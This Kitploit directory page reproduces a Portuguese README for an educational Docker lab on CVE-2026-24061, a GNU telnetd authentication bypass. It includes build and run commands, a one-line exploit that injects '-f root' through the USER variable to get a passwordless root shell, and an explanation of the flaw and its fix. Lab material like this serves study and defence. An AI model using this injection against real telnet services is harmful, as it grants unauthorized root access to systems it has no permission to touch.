Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061_Lab — Educational Docker lab demonstrating CVE-2026-24061, an authentication bypass in GNU telnetd allowing root access via argument injection in the USER environment variable. | Kitploit
Ferramentas/GitHubGitHub/gabs-hub/cve-2026-24061_lab
Vulnerability AnalysisExploitationAuthenticationLearning & EducationLabs & Practice
GitHubgabs-hub/cve-2026-24061_lab

CVE-2026-24061_Lab

Educational Docker lab demonstrating CVE-2026-24061, an authentication bypass in GNU telnetd allowing root access via argument injection in the USER environment variable.

Ver Repositório
há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24061 Telnetd Lab

Este repositório contém um laboratório simples em Docker para demonstrar a vulnerabilidade CVE-2026-24061. Ela permite bypass de autenticação e acesso como root no GNU telnetd, no linux.

O objetivo é exclusivamente educacional.

Requisitos

  • Docker instalado
  • Telnet Client instalado

Build da imagem

root@kitploit:~
docker build -t cve-2026-24061 .

Execução do container

root@kitploit:~
docker run -it -p 2323:23 cve-2026-24061

Exploração

Em outro terminal, execute:

root@kitploit:~
USER="-f root" telnet -a localhost 2323

Após isso, o acesso será concedido diretamente como root, sem solicitação de senha.

Observações

  • O container utiliza uma versão vulnerável do GNU inetutils telnetd
  • O serviço Telnet não deve ser exposto em ambientes reais
  • Utilize este laboratório apenas para estudo e demonstração

Como a vulnerabilidade funciona?

A falha ocorre devido a uma injeção de argumentos durante a invocação do utilitário /usr/bin/login. O telnetd constrói dinamicamente a linha de comando usada para chamar o login e inclui o valor da variável de ambiente USER por meio do placeholder %U, sem qualquer sanitização.

Como o utilitário login aceita a opção -f, que ignora a autenticação por senha, um atacante pode definir USER="-f root" e forçar o login direto como root.

Como o telnetd é executado com privilégios elevados, essa manipulação resulta imediatamente em uma shell root sem necessidade de credenciais válidas. A exploração é simples, não exige interação prévia e pode ser facilmente automatizada, o que justifica a pontuação CVSS 9.8.

A vulnerabilidade foi corrigida com a introdução de validação e sanitização da variável USER, bloqueando valores iniciados por hífen e caracteres especiais, impedindo a injeção de argumentos no login.

Baixar ferramenta